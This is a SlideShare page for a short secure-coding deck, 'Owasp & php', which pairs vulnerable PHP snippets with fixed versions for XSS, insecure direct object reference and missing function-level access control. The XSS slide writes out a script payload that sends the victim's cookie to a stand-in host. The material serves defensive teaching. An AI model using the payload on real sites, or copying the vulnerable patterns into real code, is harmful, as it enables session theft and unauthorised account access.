![A3 – steal user cookie
3
<?php
// page prune to XSS
// script.php?search=hello
$results = some_search_function($_REQUEST['search']);
?>
<html>
<body>
<p>results for : <?= $_REQUEST['search']; ?>
<?=render_results($results); ?>
</body>
</html>
// set search to: "<script>document.location='http://www.example.com/precious_cookie
?cookie='+document.cookie</script>"
<?php
// page prune to XSS
// script.php?search=hello
$results = some_search_function($_REQUEST['search']);
?>
<html>
<body>
<p>results for : <?=
htmlentities($_REQUEST['search'],ENT_COMPAT|ENT_HTML401,'UTF-8'); ?>
<?=render_results($results); ?>
</body>
</html>](https://image.slidesharecdn.com/owasp-180720181305/75/owasp-php-3-2048.jpg?cb=1672525001)
![A4 – Access other user account
5
<?php
// prune to insecure direct reference
// script.php?account=10
$accountId =
intval($_REQUEST['account']);
$account = new Account($accountId); echo
render_account_info($account);
// and if I change account to "9" ?
<?php
// script.php?account=10
$user = new User($_SESSION['userInfo']);
$accountId =
intval($_REQUEST['account']);
$account = new Account($accountId); if (
$account->canRead($user)) {
echo render_account_info($account);
} else {
echo "Access denied";
}](https://image.slidesharecdn.com/owasp-180720181305/75/owasp-php-5-2048.jpg?cb=1672525001)
![A7 – insecure function
8
<?php
// prune to insecure function
access
// script.php?user=john&action=read
$userId
$action
$user
=
= $_REQUEST['user'];
=
$_REQUEST['action'];
newUser($userId);
switch($action) { case 'read':
echo render_user($user); break;
case 'delete':
$user->delete(); echo "user
Deleted"; break;
}
// and if I change action to
"delete"?
<?php
$userId =
$_REQUEST['user'];
$action =
$_REQUEST['action'];
$loggedUser = new
AppUser($_SESSION['userInfo']);$user = new User($userId); switch($action) {
case 'read':
if ( $user->canRead($loggedUser) ){
echo render_user($user);
}
break; case 'delete':
if ( $user->canDelete($loggedUser) ){
$user->delete(); echo "user Deleted";
}
break;
}](https://image.slidesharecdn.com/owasp-180720181305/75/owasp-php-8-2048.jpg?cb=1672525001)
Owasp & php
•0 j'aime•32 vues
Signaler
Partager
Télécharger pour lire hors ligne
Owasp & php
Contenu connexe
Tendances
Tendances(20)
Similaire à Owasp & php
Similaire à Owasp & php(20)
Plus de Ahmed Kamel Taha
Plus de Ahmed Kamel Taha(19)
![[Software Requirements] Chapter 20: Agile Projects](https://cdn.slidesharecdn.com/ss_thumbnails/agileprojects-160123143930-thumbnail.jpg?width=768&fit=bounds)
Dernier
Dernier(20)
Owasp & php
- 1. OWASP & PHP
- 2. A3 – Cross-Site Scripting (XSS) 2 ● Whenever untrusted data is sent to the browser without proper validation and escaping! ● XSS allows the attacker to OWN the victims browser and do ... everything! ● Stored, Reflected and DOM based XSS
- 3. A3 – steal user cookie 3 <?php // page prune to XSS // script.php?search=hello $results = some_search_function($_REQUEST['search']); ?> <html> <body> <p>results for : <?= $_REQUEST['search']; ?> <?=render_results($results); ?> </body> </html> // set search to: "<script>document.location='http://www.example.com/precious_cookie ?cookie='+document.cookie</script>" <?php // page prune to XSS // script.php?search=hello $results = some_search_function($_REQUEST['search']); ?> <html> <body> <p>results for : <?= htmlentities($_REQUEST['search'],ENT_COMPAT|ENT_HTML401,'UTF-8'); ?> <?=render_results($results); ?> </body> </html>
- 4. A4 – Insecure Direct Object Reference 4 ● Whenever developer exposes references to internal objects and don't have proper access control. ● Attackers can change the references and access resources that shouldn't be accessible.
- 5. A4 – Access other user account 5 <?php // prune to insecure direct reference // script.php?account=10 $accountId = intval($_REQUEST['account']); $account = new Account($accountId); echo render_account_info($account); // and if I change account to "9" ? <?php // script.php?account=10 $user = new User($_SESSION['userInfo']); $accountId = intval($_REQUEST['account']); $account = new Account($accountId); if ( $account->canRead($user)) { echo render_account_info($account); } else { echo "Access denied"; }
- 6. A5 – Security Misconfiguration 6 ● Often fails in securing the full stack leads to application / servers being compromised. ● Take into consideration other services / applications running in the same infrastructure ● Watch out for outdated software ● Watch out for default accounts
- 7. A7 – Missing Function Level Access Control 7 ● Most applications validate function based access control before displaying options in UI, but fail to validate when the function is accessed. ● Attacker can forge request to functions that shouldn't be available
- 8. A7 – insecure function 8 <?php // prune to insecure function access // script.php?user=john&action=read $userId $action $user = = $_REQUEST['user']; = $_REQUEST['action']; newUser($userId); switch($action) { case 'read': echo render_user($user); break; case 'delete': $user->delete(); echo "user Deleted"; break; } // and if I change action to "delete"? <?php $userId = $_REQUEST['user']; $action = $_REQUEST['action']; $loggedUser = new AppUser($_SESSION['userInfo']);$user = new User($userId); switch($action) { case 'read': if ( $user->canRead($loggedUser) ){ echo render_user($user); } break; case 'delete': if ( $user->canDelete($loggedUser) ){ $user->delete(); echo "user Deleted"; } break; }
- 9. A9 – Using Components with know Vulnerabilities 9 ● Whenever you use libraries, frameworks, or other software modules with known vulnerabilities. ● Attackers can leverage this issues to attack your application / server / etc.
- 10. Thank you